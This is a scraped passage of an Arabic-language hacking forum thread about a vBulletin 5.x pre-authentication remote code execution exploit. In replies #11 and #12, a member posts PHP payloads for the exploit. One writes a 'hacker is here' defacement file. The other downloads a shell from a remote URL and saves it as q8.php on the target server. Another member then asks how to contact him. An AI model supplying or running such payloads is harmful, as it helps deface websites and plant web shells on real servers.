TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > قسم الأخبار التقنية والنقاشات الجادة

قسم الأخبار التقنية والنقاشات الجادة طرح جميع النقاشات الجادة والاخبار اليوميه التي تخص اختراق المواقع وتبعاتها ...

 
أدوات الموضوع انواع عرض الموضوع
  #11  
قديم 28-09-2019, 06:22 AM
الصورة الرمزية Dr.5RaB
Dr.5RaB
عضو نشيط
 
حـالة التــواجـد : Dr.5RaB غير متواجد حالياً
تاريخ التسجيل: May 2011
مكـان الإقامـة : /
الجــــنــــــس: ذكـر
المشاركات: 84
شكراً:93
تم شكره 136 مرة في 37 مشاركة
معدل تقييم المستوى: 9
Dr.5RaB على طريق التميز
افتراضي رد: vBulletin 5.x 0day pre-auth RCE exploit

من ناحية تطوير الإستغلال



اقتباس:
$file='q8.txt'; $text='hacker is here'; file_put_contents($file,$text);

 
 

 

 

سبحان الله وبحمدة ، سبحان الله العظيــم

رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Dr.5RaB على المشاركة المفيدة:
  #12  
قديم 29-09-2019, 01:12 AM
الصورة الرمزية Dr.5RaB
Dr.5RaB
عضو نشيط
 
حـالة التــواجـد : Dr.5RaB غير متواجد حالياً
تاريخ التسجيل: May 2011
مكـان الإقامـة : /
الجــــنــــــس: ذكـر
المشاركات: 84
شكراً:93
تم شكره 136 مرة في 37 مشاركة
معدل تقييم المستوى: 9
Dr.5RaB على طريق التميز
افتراضي رد: vBulletin 5.x 0day pre-auth RCE exploit

عفوآ لم انتبه للردود التي قبلي


إستغلالي لهـذي الثغره كـ التالي

كود:
  $text=file_get_contents('https://google.com/shell.txt');$file='q8.php';file_put_contents($file,$text);

إستخدام دالة file_get_contens,file_put_contents


وشكرآ  

 

 

سبحان الله وبحمدة ، سبحان الله العظيــم

رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Dr.5RaB على المشاركة المفيدة:
  #13  
قديم 01-10-2019, 09:31 PM
الصورة الرمزية Dr1337
Dr1337
مسجل جديد
 
حـالة التــواجـد : Dr1337 غير متواجد حالياً
تاريخ التسجيل: Sep 2019
الجــــنــــــس: ذكـر
المشاركات: 1
شكراً:0
تم شكره 0 مرة في 0 مشاركة
معدل تقييم المستوى: 0
Dr1337 بدون تقييم
افتراضي رد: vBulletin 5.x 0day pre-auth RCE exploit

اقتباس:
المشاركة الأصلية كتبت بواسطة dr.5rab مشاهدة المشاركة

عفوآ لم انتبه للردود التي قبلي


إستغلالي لهـذي الثغره كـ التالي

كود:
  $text=file_get_contents('https://google.com/shell.txt');$file='q8.php';file_put_contents($file,$text);

إستخدام دالة file_get_contens,file_put_contents


وشكرآ
كيف نقدر نتواصل معك لو سمحت  
رد مع اقتباس


الذين يشاهدون محتوى الموضوع الآن : 2 ( الأعضاء 0 والزوار 2)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit MA DANGER قسم جديد ثغرات الأعضاء 33 03-11-2013 04:05 PM
[webapps / 0day] - Bintech Systems LLC Admin Auth Bypass Exploit inj3ct0r قسم جديد ثغرات مواقع الحماية 0 28-09-2011 10:00 PM
[webapps] - If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit exploit-db قسم جديد ثغرات مواقع الحماية 0 15-03-2011 05:10 PM


الساعة الآن 03:39 PM